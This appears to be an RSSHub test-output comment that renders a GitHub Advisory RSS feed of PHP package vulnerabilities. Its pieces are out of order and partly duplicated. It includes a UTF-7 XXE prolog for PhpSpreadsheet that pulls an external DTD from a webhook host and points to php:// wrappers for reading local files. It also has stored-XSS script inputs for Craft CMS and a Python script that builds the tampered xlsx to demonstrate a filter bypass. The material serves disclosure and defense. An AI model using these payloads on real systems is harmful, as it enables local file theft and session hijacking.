<p>If you add this header to any XML file inside an xlsx-formatted file, such as the sharedStrings.xml file, then the XXE will execute.</p>
<h3 id="poc">PoC</h3>
<ol>
<li>Create a simple xlsx file</li>
<li>Rename the xlsx to zip</li>
<li>Go into the zip and open the <code>xl/sharedStrings.xml</code> file in edit mode.</li>
<li>Replace <code>&lt;?xml version="1.0" encoding="UTF-8" standalone="yes"?&gt;</code> with</li>
</ol>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<ol start="5">
<li>Save <code>sharedStrings.xml</code> file and rename zip back to xlsx.</li>
<li>Use minimal PHP code that simply opens this xlsx file:</li>
</ol>
<pre><code>use PhpOffice\PhpSpreadsheet\IOFactory;
require __DIR__ . '/vendor/autoload.php';
$spreadsheet = IOFactory::load("file.xlsx");
</code></pre>
<ol start="7">
<li>You will receive a request to your <code>http://%webhook%/file.dtd</code></li>
<li>Don't forget that you can use PHP wrappers in the XXE; some php:// wrapper payloads allow fetching local files.</li>
</ol>
<h3 id="impact">Impact</h3>
<p>Read local files
<img alt="lfi" src="https://github.com/PHPOffice/PhpSpreadsheet/assets/95242087/1839cddb-6bb0-486d-8884-9ac485776931" referrerpolicy="no-referrer"></p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45048">https://nvd.nist.gov/vuln/detail/CVE-2024-45048</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda">https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-ghg6-32f9-2jp7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</guid>
<author>GitHub</author>
</item>
<item>
<title>[twig/twig] Twig has a possible sandbox bypass</title>
<description><h3 id="description">Description</h3>
<p>Under some circumstances, the sandbox security checks are not run which allows user-contributed templates to bypass the sandbox restrictions.</p>
<p>The security issue happens when all these conditions are met:</p>
<ul>
<li>The sandbox is disabled globally;</li>
<li>The sandbox is enabled via a sandboxed <code>include()</code> function which references a template name (like <code>included.twig</code>) and not a <code>Template</code> or <code>TemplateWrapper</code> instance;</li>
<li>The included template has been loaded before the <code>include()</code> call but in a non-sandbox context (possible as the sandbox has been globally disabled).</li>
</ul>
<h3 id="resolution">Resolution</h3>
<p>The patch ensures that the sandbox security checks are always run at runtime.</p>
<h3 id="credits">Credits</h3>
<p>We would like to thank Fabien Potencier for reporting and fixing the issue.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66">https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6">https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de">https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233">https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45411">https://nvd.nist.gov/vuln/detail/CVE-2024-45411</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635">https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635</a></li>
<li><a href="https://github.com/advisories/GHSA-6j75-5wfj-gh66">https://github.com/advisories/GHSA-6j75-5wfj-gh66</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-6j75-5wfj-gh66</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-6j75-5wfj-gh66</guid>
<author>GitHub</author>
</item>
<item>
<title>[damienharper/auditor-bundle] auditor-bundle vulnerable to Cross-site Scripting because name of entity does not get escaped</title>
<description><h3 id="summary">Summary</h3>
<p>Unescaped entity property enables Javascript injection.</p>
<h3 id="details">Details</h3>
<p>I think this is possible because <code>%source_label%</code> in the Twig macro is not escaped. Therefore script tags can be inserted and are executed.</p>
<h3 id="poc">PoC</h3>
<ul>
<li>clone example project <a href="https://github.com/DamienHarper/auditor-bundle-demo">https://github.com/DamienHarper/auditor-bundle-demo</a></li>
<li>create author with FullName </li>
<li>delete author</li>
<li>view audit of authors</li>
<li>alert is displayed</li>
</ul>
<h3 id="impact">Impact</h3>
<p>Persistent XSS: JS can be injected and executed.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/DamienHarper/auditor-bundle/security/advisories/GHSA-78vg-7v27-hj67">https://github.com/DamienHarper/auditor-bundle/security/advisories/GHSA-78vg-7v27-hj67</a></li>
<li><a href="https://github.com/DamienHarper/auditor-bundle/commit/42ba2940d8b99467de0c806ea5655cc1c6882cd1">https://github.com/DamienHarper/auditor-bundle/commit/42ba2940d8b99467de0c806ea5655cc1c6882cd1</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45592">https://nvd.nist.gov/vuln/detail/CVE-2024-45592</a></li>
<li><a href="https://github.com/advisories/GHSA-78vg-7v27-hj67">https://github.com/advisories/GHSA-78vg-7v27-hj67</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-78vg-7v27-hj67</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-78vg-7v27-hj67</guid>
<author>GitHub</author>
</item>
<item>
<title>[topthink/framework] ThinkPHP deserialization vulnerability</title>
<description><p>A deserialization vulnerability in ThinkPHP v6.1.3 to v8.0.4 allows attackers to execute arbitrary code.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-44902">https://nvd.nist.gov/vuln/detail/CVE-2024-44902</a></li>
<li><a href="https://github.com/fru1ts/CVE-2024-44902">https://github.com/fru1ts/CVE-2024-44902</a></li>
<li><a href="http://thinkphp.com/">http://thinkphp.com</a></li>
<li><a href="https://github.com/advisories/GHSA-f4wh-359g-4pq7">https://github.com/advisories/GHSA-f4wh-359g-4pq7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-f4wh-359g-4pq7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-f4wh-359g-4pq7</guid>
<author>GitHub</author>
</item>
<item>
<title>[craftcms/cms] Craft CMS vulnerable to stored XSS in breadcrumb list and title fields</title>
<description><h3 id="summary">Summary</h3>
<p>Multiple Stored XSS can be triggered by the breadcrumb list and title fields with user input.</p>
<h3 id="details">Details</h3>
<ol>
<li>In the <strong>/admin/categories</strong> page, the category title isn't sanitized and triggers XSS.</li>
<li>In the category edit page under <strong>/admin/categories/</strong>, the category title in the breadcrumb list isn't sanitized and triggers XSS.</li>
<li>In the <strong>/admin/entries</strong> page, the entry title isn't sanitized and triggers XSS.</li>
<li>In the entry edit page under <strong>/admin/entries/</strong>, the entry title in the breadcrumb list isn't sanitized and triggers XSS.</li>
<li>In <strong>/admin/myaccount</strong> and the pages under it, the username or full name in the breadcrumb list isn't sanitized and triggers XSS.</li>
</ol>
<h3 id="impact">Impact</h3>
<p>Malicious users can tamper with the control panel.</p>
<h3 id="poc">PoC</h3>
<h4 id="1-in-the-admincategories-page-category-title-isnt-sanitized-and-triggered-xss">1. In the <strong>/admin/categories</strong> page, the category title isn't sanitized and triggers XSS.</h4>
<pre><code>1. Access the Settings -&gt; Categories ( /admin/settings/categories )
2. Create a new category group
3. Access the Categories page ( /admin/categories/ )
4. Push the New category button
5. Input the Title column : xss&lt;script&gt;alert('xss')&lt;/script&gt;
6. Push the Create Category or Save button
7. Access the Categories page again and it triggers XSS
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/a1b2890e-731b-4fc4-b189-26591f4486fd" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/4e0f35c7-fbb0-4d38-a0b5-9e28750ff706" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/e046b9db-d83c-4f81-ad91-165c5afedeb9" referrerpolicy="no-referrer"></p>
<h4 id="2-in-the-category-edit-page-under-the-admincategories-category-title-in-breadcrumb-list-isnt-sanitized-and-triggered-xss">2. In the category edit page under <strong>/admin/categories/</strong>, the category title in the breadcrumb list isn't sanitized and triggers XSS.</h4>
<pre><code>1. Access the Settings -&gt; Categories ( /admin/settings/categories )
2. Create a new category group
3. Access the Categories page ( /admin/categories/ )
4. Push the New category button
5. Input the Title column : xss&lt;script&gt;alert('xss')&lt;/script&gt;
6. Push the Create Category or Save button
7. Access the Category edit page again and it triggers XSS
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/a1b2890e-731b-4fc4-b189-26591f4486fd" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/f7543a11-58eb-4099-9ee2-3461816c52ea" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/f01bbb80-4417-42ca-bf51-b38860f6c74a" referrerpolicy="no-referrer"></p>
<h4 id="3-in-the-adminentries-page-entry-title-isnt-sanitized-and-triggered-xss">3. In the <strong>/admin/entries</strong> page, the entry title isn't sanitized and triggers XSS.</h4>
<pre><code>1. Access the Settings -&gt; Entry Types ( /admin/settings/entry-types )
2. Create a new entry type
3. Access the Settings -&gt; Sections ( /admin/settings/sections )
4. Create a new section
5. Access the Entries page ( /admin/entries )
6. Push the New entry button
7. Input the Title column : xss&lt;script&gt;alert('xss')&lt;/script&gt;
8. Push the Create entry or Save button
9. Access the Entries page again and it triggers XSS
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/ba700899-947f-4421-a1b7-3f0cc2c0da30" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/b255a999-e48c-46be-b732-4482ea9cee9a" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/445d8e0c-71b6-49c7-8f4a-37541dcc9c85" referrerpolicy="no-referrer"></p>
<h4 id="4-in-the-entry-edit-page-under-the-adminentries-entry-title-in-breadcrumb-list-isnt-sanitized-and-triggered-xss">4. In the entry edit page under <strong>/admin/entries/</strong>, the entry title in the breadcrumb list isn't sanitized and triggers XSS.</h4>
<pre><code>1. Access the Settings -&gt; Entry Types page ( /admin/settings/entry-types )
2. Create a new entry type
3. Access the Settings -&gt; Sections page ( /admin/settings/sections )
4. Create a new section
5. Access the Entries page ( /admin/entries )
6. Push the New entry button
7. Input the Title column : xss&lt;script&gt;alert('xss')&lt;/script&gt;
8. Push the Create entry or Save button
9. Access the Entry edit page again and it triggers XSS
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/ba700899-947f-4421-a1b7-3f0cc2c0da30" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/a59a122b-b9e7-4695-be13-eb8a1c2d36df" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/b0d27446-7ac6-47e7-ac02-20c924698b13" referrerpolicy="no-referrer"></p>
<h4 id="5-in-the-adminmyaccount-and-pages-under-it-username-or-full-name-in-breadcrumb-list-isnt-sanitized-and-triggered-xss">5. In <strong>/admin/myaccount</strong> and the pages under it, the username or full name in the breadcrumb list isn't sanitized and triggers XSS.</h4>
<pre><code>1. Access the My Account page ( /admin/myaccount )
2. Input the Full Name column : xss&lt;script&gt;alert('xss')&lt;/script&gt;
3. Push the Save button
4. Access the My Account page ( /admin/myaccount ) or the pages under it ( /admin/myaccount/addresses , /admin/myaccount/preferences , etc.) and it triggers XSS
</code></pre>
<p><img alt="image" src="https://github.com/craftcms/cms/assets/83068208/3be45bdd-0757-42a8-bc5d-320ab2339fd0" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/e1be7446-1c54-42bc-af9a-a8ac81a2d7bf" referrerpolicy="no-referrer">
<img alt="image" src="https://github.com/craftcms/cms/assets/83068208/5fa06b26-fecd-40f5-bc8b-171f881f8a2a" referrerpolicy="no-referrer"></p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/craftcms/cms/security/advisories/GHSA-28h4-788g-rh42">https://github.com/craftcms/cms/security/advisories/GHSA-28h4-788g-rh42</a></li>
<li><a href="https://github.com/craftcms/cms/commit/b7348942f8131b3868ec6f46d615baae50151bb8">https://github.com/craftcms/cms/commit/b7348942f8131b3868ec6f46d615baae50151bb8</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45406">https://nvd.nist.gov/vuln/detail/CVE-2024-45406</a></li>
<li><a href="https://github.com/advisories/GHSA-28h4-788g-rh42">https://github.com/advisories/GHSA-28h4-788g-rh42</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-28h4-788g-rh42</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-28h4-788g-rh42</guid>
<author>GitHub</author>
</item>
<item>
<title>[nategood/httpful] Httpful is Missing Certificate Validation</title>
<description><p>Httpful has Insecure HTTPS Connections due to Missing Default Certificate Validation</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/nategood/httpful/issues/247">https://github.com/nategood/httpful/issues/247</a></li>
<li><a href="https://github.com/nategood/httpful/commit/44c880e4f559e9215dc6ea9fe50315500c6c2c84">https://github.com/nategood/httpful/commit/44c880e4f559e9215dc6ea9fe50315500c6c2c84</a></li>
<li><a href="https://github.com/FriendsOfPHP/security-advisories/blob/master/nategood/httpful/2024-05-01.yaml">https://github.com/FriendsOfPHP/security-advisories/blob/master/nategood/httpful/2024-05-01.yaml</a></li>
<li><a href="https://github.com/nategood/httpful/blob/fc8e4274a09529a6ff29b9c6c0a105ee43dbfda5/src/Httpful/Request.php#L35">https://github.com/nategood/httpful/blob/fc8e4274a09529a6ff29b9c6c0a105ee43dbfda5/src/Httpful/Request.php#L35</a></li>
<li><a href="https://huntr.com/bounties/8d59c089-92f1-4b73-90f8-54968a70e2fb">https://huntr.com/bounties/8d59c089-92f1-4b73-90f8-54968a70e2fb</a></li>
<li><a href="https://github.com/advisories/GHSA-gcfg-hmwx-wq5h">https://github.com/advisories/GHSA-gcfg-hmwx-wq5h</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-gcfg-hmwx-wq5h</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-gcfg-hmwx-wq5h</guid>
<author>GitHub</author>
</item>
<item>
<title>[twbs/bootstrap] Bootstrap Cross-Site Scripting (XSS) vulnerability</title>
<description><p>A vulnerability has been identified in Bootstrap that exposes users to Cross-Site Scripting (XSS) attacks. The issue is present in the carousel component, where the data-slide and data-slide-to attributes can be exploited through the href attribute of an &lt;a&gt; tag due to inadequate sanitization. This vulnerability could potentially enable attackers to execute arbitrary JavaScript within the victim's browser.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-6531">https://nvd.nist.gov/vuln/detail/CVE-2024-6531</a></li>
<li><a href="https://www.herodevs.com/vulnerability-directory/cve-2024-6531">https://www.herodevs.com/vulnerability-directory/cve-2024-6531</a></li>
<li><a href="https://github.com/rubysec/ruby-advisory-db/blob/master/gems/bootstrap/CVE-2024-6531.yml">https://github.com/rubysec/ruby-advisory-db/blob/master/gems/bootstrap/CVE-2024-6531.yml</a></li>
<li><a href="https://github.com/advisories/GHSA-vc8w-jr9v-vj7f">https://github.com/advisories/GHSA-vc8w-jr9v-vj7f</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-vc8w-jr9v-vj7f</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-vc8w-jr9v-vj7f</guid>
<author>GitHub</author>
</item>
<item>
<title>[reportico-web/reportico] SQL Injection vulnerability in Reportico Till</title>
<description><p>SQL Injection vulnerability in Reportico Till 8.1.0 allows attackers to obtain sensitive information or other system information via the project parameter.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-47438">https://nvd.nist.gov/vuln/detail/CVE-2023-47438</a></li>
<li><a href="https://github.com/reportico-web/reportico/issues/52">https://github.com/reportico-web/reportico/issues/52</a></li>
<li><a href="https://github.com/advisories/GHSA-jjf4-959w-f545">https://github.com/advisories/GHSA-jjf4-959w-f545</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-jjf4-959w-f545</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-jjf4-959w-f545</guid>
<author>GitHub</author>
</item>
<item>
<title>[phpoffice/phpspreadsheet] PhpSpreadsheet HTML writer is vulnerable to Cross-Site Scripting via style information</title>
<description><h3 id="summary">Summary</h3>
<p><code>\PhpOffice\PhpSpreadsheet\Writer\Html</code> doesn't sanitize spreadsheet styling information such as font names, allowing an attacker to inject arbitrary JavaScript on the page.</p>
<h3 id="poc">PoC</h3>
<p>Example target script:</p>
<pre><code>&lt;?php
require 'vendor/autoload.php';
$reader = \PhpOffice\PhpSpreadsheet\IOFactory::createReader("Xlsx");
$spreadsheet = $reader-&gt;load(__DIR__ . '/book.xlsx');
$writer = new \PhpOffice\PhpSpreadsheet\Writer\Html($spreadsheet);
print($writer-&gt;generateHTMLAll());
</code></pre>
<p>Save this file in the same directory:
<a href="https://github.com/PHPOffice/PhpSpreadsheet/files/15212797/book.xlsx">book.xlsx</a></p>
<p>Open index.php in a web browser. An alert should be displayed.</p>
<h3 id="impact">Impact</h3>
<p>Full takeover of the session of users viewing spreadsheet files as HTML.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-wgmf-q9vr-vww6">https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-wgmf-q9vr-vww6</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45046">https://nvd.nist.gov/vuln/detail/CVE-2024-45046</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/pull/3957">https://github.com/PHPOffice/PhpSpreadsheet/pull/3957</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/commit/f7cf378faed2e11cf4825bf8bafea4922ae44667">https://github.com/PHPOffice/PhpSpreadsheet/commit/f7cf378faed2e11cf4825bf8bafea4922ae44667</a></li>
<li><a href="https://github.com/advisories/GHSA-wgmf-q9vr-vww6">https://github.com/advisories/GHSA-wgmf-q9vr-vww6</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-wgmf-q9vr-vww6</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-wgmf-q9vr-vww6</guid>
<author>GitHub</author>
</item>
<item>
<title>[phpoffice/phpspreadsheet] XXE in PHPSpreadsheet encoding is returned</title>
<description><h3 id="summary">Summary</h3>
<p>Bypassing the filter allows an XXE attack, which in turn allows an attacker to obtain the contents of local files, even if error reporting is muted by the @ symbol (LFI attack).</p>
<h3 id="details">Details</h3>
<p>The check <code> $pattern = '/encoding="(.*?)"/';</code> is easy to bypass. Just use a single quote symbol <code>'</code>. So the payload looks like this:</p>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<p>If you add this header to any XML file inside the xlsx-formatted file, such as the sharedStrings.xml file, then the XXE will execute.</p>
<h3 id="poc">PoC</h3>
<ol>
<li>Create simple xlsx file</li>
<li>Rename xlsx to zip</li>
<li>Go to the zip and open the <code>xl/sharedStrings.xml</code> file in edit mode.</li>
<li>Replace <code>&lt;?xml version="1.0" encoding="UTF-8" standalone="yes"?&gt;</code> with</li>
</ol>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<ol start="5">
<li>Save <code>sharedStrings.xml</code> file and rename zip back to xlsx.</li>
<li>Use minimal php code that simply opens this xlsx file:</li>
</ol>
<pre><code>&lt;?php
// Loading the tampered workbook is enough: the reader parses xl/sharedStrings.xml
use PhpOffice\PhpSpreadsheet\IOFactory;
require __DIR__ . '/vendor/autoload.php';
$spreadsheet = IOFactory::load("file.xlsx");
</code></pre>
<ol start="7">
<li>You will receive a request to your <code>http://%webhook%/file.dtd</code></li>
<li>Don't forget that you can use PHP wrappers in the XXE; some php:// wrapper payloads allow fetching local files.</li>
</ol>
<h3 id="impact">Impact</h3>
<p>Read local files
<img alt="lfi" src="https://github.com/PHPOffice/PhpSpreadsheet/assets/95242087/1839cddb-6bb0-486d-8884-9ac485776931" referrerpolicy="no-referrer"></p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45048">https://nvd.nist.gov/vuln/detail/CVE-2024-45048</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda">https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-ghg6-32f9-2jp7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</guid>
<author>GitHub</author>
</item>
<item>
<title>[pimcore/pimcore] Pimcore includes vulnerable PHPOffice/PhpSpreadsheet</title>
<description><h3 id="summary">Summary</h3>
<p>Pimcore 10.6.x and Enterprise 10.6.x versions currently depend on PHPOffice/PhpSpreadsheet version 1.x, which has recently been identified with a security vulnerability (CVE-2024-45048). To mitigate this issue, it is recommended to update to the latest version 2.2.2. For more details, please refer to the official advisory: <a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">GHSA-ghg6-32f9-2jp7</a>.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4">https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://github.com/advisories/GHSA-hq76-662x-7mw4">https://github.com/advisories/GHSA-hq76-662x-7mw4</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-hq76-662x-7mw4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-hq76-662x-7mw4</guid>
<author>GitHub</author>
</item>
<item>
<title>[pimcore/admin-ui-classic-bundle] Pimcore includes vulnerable PHPOffice/PhpSpreadsheet</title>
<description><h3 id="summary">Summary</h3>
<p>Pimcore 10.6.x and Enterprise 10.6.x versions currently depend on PHPOffice/PhpSpreadsheet version 1.x, which has recently been identified with a security vulnerability (CVE-2024-45048). To mitigate this issue, it is recommended to update to the latest version 2.2.2. For more details, please refer to the official advisory: <a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">GHSA-ghg6-32f9-2jp7</a>.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4">https://github.com/pimcore/pimcore/security/advisories/GHSA-hq76-662x-7mw4</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://github.com/advisories/GHSA-hq76-662x-7mw4">https://github.com/advisories/GHSA-hq76-662x-7mw4</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-hq76-662x-7mw4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-hq76-662x-7mw4</guid>
<author>GitHub</author>
</item>
</channel>
</rss> ... |
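The bypass described in GHSA-ghg6-32f9-2jp7 above comes down to a declaration check that only recognises double quotes, so a single-quoted `encoding='UTF-7'` is never seen and the `+ADw-` (UTF-7 for `<`) DOCTYPE sails past any byte-level scan for `<!DOCTYPE`. The following Python script is an added example written for this page; it is not code from the advisory, from PhpSpreadsheet, or from this pull request. It reproduces the PoC steps on a constructed two-part workbook, then runs the tampered part through a model scanner twice: once with the advisory's `encoding="(.*?)"` pattern and once with a hypothetical quote-agnostic pattern. The scanner logic (transcode using the declared encoding, then look for DOCTYPE/ENTITY), the `DECL_FIXED` pattern, the sample workbook and all function names are assumptions made for the demonstration; they do not describe PhpSpreadsheet's actual patch (see the linked commit for that). Python is used instead of PHP so the example runs stand-alone.

```python
import io
import re
import zipfile
from typing import List, Optional

# Constructed sample data (not from the advisory): a minimal two-part "xlsx".
# Only xl/sharedStrings.xml matters for the demonstration.
CLEAN_SHARED_STRINGS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
    '<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">'
    "<si><t>hello</t></si></sst>"
)

# The prolog from the advisory's PoC: single-quoted encoding declaration,
# followed by a DOCTYPE written in UTF-7 ("+ADw-" decodes to "<").
BYPASS_PROLOG = (
    "<?xml version=\"1.0\" encoding='UTF-7' standalone=\"yes\"?>\n"
    '+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"> %xxe;]>\n'
)

# Declaration patterns. DECL_WEAK is the one quoted in the advisory; DECL_FIXED
# is a hypothetical hardening that accepts either quote character.
DECL_WEAK = re.compile(rb'encoding="(.*?)"')
DECL_FIXED = re.compile(rb"""encoding=(["'])(.*?)\1""")
DOCTYPE = re.compile(r"<!(?:DOCTYPE|ENTITY)", re.IGNORECASE)


def make_clean_xlsx() -> bytes:
    """Build the constructed sample workbook in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", '<?xml version="1.0" encoding="UTF-8"?><Types/>')
        zf.writestr("xl/sharedStrings.xml", CLEAN_SHARED_STRINGS)
    return buf.getvalue()


def tamper_xlsx(xlsx: bytes) -> bytes:
    """PoC steps 2-5: rewrite the prolog of xl/sharedStrings.xml inside the zip."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(xlsx)) as src, zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            data = src.read(info.filename)
            if info.filename == "xl/sharedStrings.xml":
                body = data.decode("utf-8").split("?>", 1)[1]  # drop the original prolog
                data = (BYPASS_PROLOG + body).encode("ascii")
            dst.writestr(info, data)
    return out.getvalue()


def declared_encoding(xml: bytes, strict: bool) -> Optional[str]:
    """Return the encoding named in the XML declaration, or None if not found."""
    m = (DECL_FIXED if strict else DECL_WEAK).search(xml)
    if m is None:
        return None
    return m.group(2 if strict else 1).decode("ascii")


def has_doctype(xml: bytes, strict: bool) -> bool:
    """Model of a pre-parse scanner: decode using the declared encoding, then
    look for DOCTYPE/ENTITY. With the weak pattern the UTF-7 declaration is
    missed, the bytes are read as UTF-8, and '+ADw-!DOCTYPE' never matches
    '<!DOCTYPE'."""
    enc = declared_encoding(xml, strict) or "utf-8"
    try:
        text = xml.decode(enc)
    except (LookupError, UnicodeDecodeError):
        return True  # unknown or undecodable encoding: reject rather than guess
    return DOCTYPE.search(text) is not None


def scan_xlsx(xlsx: bytes, strict: bool) -> List[str]:
    """Names of XML parts inside the container that the scanner would reject."""
    with zipfile.ZipFile(io.BytesIO(xlsx)) as zf:
        return [
            name for name in zf.namelist()
            if name.lower().endswith(".xml") and has_doctype(zf.read(name), strict)
        ]


if __name__ == "__main__":
    clean = make_clean_xlsx()
    bad = tamper_xlsx(clean)
    print("weak scanner, tampered file :", scan_xlsx(bad, strict=False))  # [] -> bypassed
    print("fixed scanner, tampered file:", scan_xlsx(bad, strict=True))   # ['xl/sharedStrings.xml']
```

Run the script directly: the weak pass returns an empty list for the tampered file because the UTF-7 bytes are never transcoded before the DOCTYPE search, while the strict pass flags xl/sharedStrings.xml. The check has to run on every XML part of the OOXML container, not only sharedStrings.xml, since the advisory notes that any part will do; and an undecodable or unknown declared encoding should be treated as a rejection, not silently read as UTF-8.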
http://localhost:1200/github-advisor/data/composer - Success ✔️<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0">
<channel>
<title>GitHub Advisory Database RSS - composer</title>
<link>https://github.com/advisories</link>
<atom:link href="http://localhost:1200/github-advisor/data/composer" rel="self" type="application/rss+xml"></atom:link>
<description>GitHub Advisory Database RSS - composer - Powered by RSSHub</description>
<generator>RSSHub</generator>
<webMaster>contact@rsshub.app (RSSHub)</webMaster>
<language>en</language>
